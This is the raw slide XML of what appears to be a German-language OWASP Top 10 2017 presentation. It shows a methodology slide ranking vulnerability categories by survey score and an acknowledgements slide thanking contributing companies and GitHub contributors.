                        <a:rPr lang="de-DE"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dass sie den jeweiligen Schwachstellentyp enthalten.</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Die Häufigkeit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="95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einer Schwachstelle ging bei der Berechnung des jeweiligen Risikowertes über den Risiko-Faktor 'Verbreitung' ein und wurde so in der </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE"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Rangfolge der Top 10 berücksichtigt.</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889179698"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3500"/>
              <a:t>+DAT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Methodik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> und </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Daten</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="16" name="Table 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="281399348"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="503675" y="3042000"/>
          <a:ext cx="5867402" cy="1293912"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1"/>
              <a:tblGrid>
                <a:gridCol w="338504">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4995497">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="533401">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="215652">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Rank</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b="1" i="0">
                          <a:effectLst/>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Survey Vulnerability Categories</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" i="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b="1" i="0">
                          <a:effectLst/>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Score</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" i="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1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="120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Exposure of Private Information ('Privacy Violation') [CWE-359]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="120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748</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="120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2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="120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Cryptographic Failures [CWE-310/311/312/326/327]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="120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584</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="120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3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="120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Deserialization of Untrusted Data [CWE-502]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="120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514</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="120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a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="120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Authorization Bypass Through User-Controlled Key (IDOR* &amp; Path Traversal) [CWE-639]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="120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493</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="120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15652">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5</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[CWE-223 / CWE-778]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440</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="120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sz="3500"/>
              <a:t>+DS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Danksagung</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 14"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="237013173"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="939600"/>
          <a:ext cx="6854400" cy="8966400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6854400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="337848">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" noProof="0" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Danksagung an Datenunterstützer</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="1600" b="1" noProof="0"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36282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950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Wir möchten uns bei den vielen Unternehmen bedanken, die ihre Schwachstellendaten zur Unterstützung des Updates 2017 beigetragen haben: </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="2000" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:endParaRPr lang="en-US" sz="20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2000" u="none" kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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10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de-DE" sz="1000" u="none" kern="1200" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Zum ersten Mal sind alle Daten, die zu einer Top-10-Veröffentlichung beigetragen wurden, inkl. einer vollständigen Unterstützerliste </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" u="none" kern="1200" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>öffentlich zugänglich</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1000" u="none" kern="1200" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="1000" kern="1200" noProof="0" dirty="0">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78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srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:uLnTx/>
                          <a:uFillTx/>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Danksagungen</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:uLnTx/>
                          <a:uFillTx/>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> an </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:uLnTx/>
                          <a:uFillTx/>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>einzelne</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:uLnTx/>
                          <a:uFillTx/>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:uLnTx/>
                          <a:uFillTx/>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Mitwirkende</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:uLnTx/>
                        <a:uFillTx/>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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608774898"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="46624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Wir möchten uns bei einzelnen Mitwirkenden bedanken, die viele Stunden damit verbracht haben, zu den Top 10 in </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">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GitHub</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE"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 beizutragen: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solidFill>
                          <a:srgbClr val="92D050"/>
                        </a:solidFill>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solidFill>
                          <a:srgbClr val="92D050"/>
                        </a:solidFill>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300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Sowie allen anderen, die uns über Twitter, E-Mail und andere Wege Feedback gegeben haben.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Wir möchten nicht vergessen zu erwähnen, dass Dirk Wetter, Jim </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Manico</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> und Osama </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Elnaggar</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> umfangreiche Hilfe geleistet haben. Chris </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Frohoff</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> und Gabriel Lawrence leisteten außerdem unschätzbare Unterstützung bei der Erstellung des neuen Kategorie </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A8:2017-Unsichere Deserialisierung</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a: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113917270"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C6CA28A-C875-42F4-A969-9E4EBCDC2625}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5594321"/>
            <a:ext cx="6858000" cy="3364124"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="5" spcCol="274320" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="82800" indent="-82800" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ak47gen</a:t>
            </a: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alonergan</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ameft</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anantshri</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bandrzej</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bchurchill</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binarious</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bkimminich</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Boberski</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borischen</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Calico90</a:t>
            </a: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chrish</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clerkendweller</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>D00gs</a:t>
            </a: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davewichers</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drkknight</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drwetter</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>dune73</a:t>
            </a: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ecbftw</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einsweniger</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ekobrin</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eoftedal</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frohoff</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fzipi</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gebl</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Gilc83</a:t>
            </a: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gilzow</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>global4g</a:t>
            </a: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grnd</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>h3xstream</a:t>
            </a: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hiralph</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HoLyVieR</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ilatypov</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irbishop</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itscooper</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ivanr</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jeremylong</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jhaddix</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jmanico</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joaomatosf</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jrmithdobbs</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jsteven</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jvehent</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katyanton</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kerberosmansour</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koto</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>m8urnett</a:t>
            </a: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mwcoates</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>neo00</a:t>
            </a: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nickthetait</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ninedter</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ossie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-git</a:t>
            </a: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PauloASilva</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PeterMosmans</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pontocom</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psiinon</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pwntester</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raesene</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riramar</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ruroot</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>securestep9</a:t>
            </a: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securitybits</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SPoint42</a:t>
            </a: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sreenathsasikumar</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>starbuck3000</a:t>
            </a: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stefanb</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sumitagarwalusa</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taprootsec</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tghosth</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TheJambo</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>thesp0nge</a:t>
            </a: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toddgrotenhuis</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troymarshall</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tsohlacol</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vdbaan</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yohgaki</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="950">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81EC5A71-CDF7-40E6-9F8A-7B7F0554B2F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8722" y="1671350"/>
            <a:ext cx="6849278" cy="2876605"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="4" spcCol="457200" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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ANCAP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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Aspect Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>AsTech</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Consulting</a:t>
            </a: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Atos</a:t>
            </a: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Branding Brand</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" fontAlgn="b">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="950" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bugcrowd</a:t>
            </a:r>
          </a:p>
